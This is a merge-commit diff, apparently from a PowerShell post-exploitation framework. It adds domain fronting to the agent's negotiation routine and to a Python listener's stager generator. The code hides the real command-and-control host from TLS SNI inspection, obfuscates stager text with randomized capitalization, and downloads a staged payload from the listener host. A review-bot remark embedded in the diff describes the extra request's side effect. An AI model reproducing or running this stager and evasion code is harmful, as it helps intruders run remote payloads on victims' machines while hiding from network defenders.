Merge pull request #730 from clr2of8/dev

Hide true host name when using domain fronting
websockets-multiuser
Steve Borosh 2017-09-30 11:27:11 -04:00 committed by GitHub
commit 0f04dd9a0d
2 changed files with 14 additions and 1 deletions


@ -113,6 +113,10 @@ function Start-Negotiate {
$headers | ForEach-Object {
$headerKey = $_.split(':')[0];
$headerValue = $_.split(':')[1];
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if ($headerKey -eq "host"){
try{$ig=$WC.DownloadData($s)}catch{}};
$wc.Headers.Add($headerKey, $headerValue);
}
}
@ -198,6 +202,10 @@ function Start-Negotiate {
$headers | ForEach-Object {
$headerKey = $_.split(':')[0];
$headerValue = $_.split(':')[1];
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if ($headerKey -eq "host"){
try{$ig=$WC.DownloadData($s)}catch{}};
$wc.Headers.Add($headerKey, $headerValue);
}
}
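Review bot: The comment added at the `if ($headerKey -eq "host")` branch explains the intent but not the side effect: whenever a Host header is configured, one extra request goes to the base URL `$s`, and the empty `catch{}` discards every failure. I would say so in the comment, e.g. `# Side effect: one extra request to $s before staging; response and any error are ignored`. It matters because the traffic seen by a tester or network monitor changes: a request to the base URL host now precedes requests that carry a different Host header. The same four lines are repeated in the second hunk of this file (`@ -198`), so the comment belongs in both places, or the branch should move into one shared helper. Start-Negotiate begins and ends outside both hunks.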


@ -272,11 +272,16 @@ class Listener:
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
#Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
@ -285,7 +290,7 @@ class Listener:
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")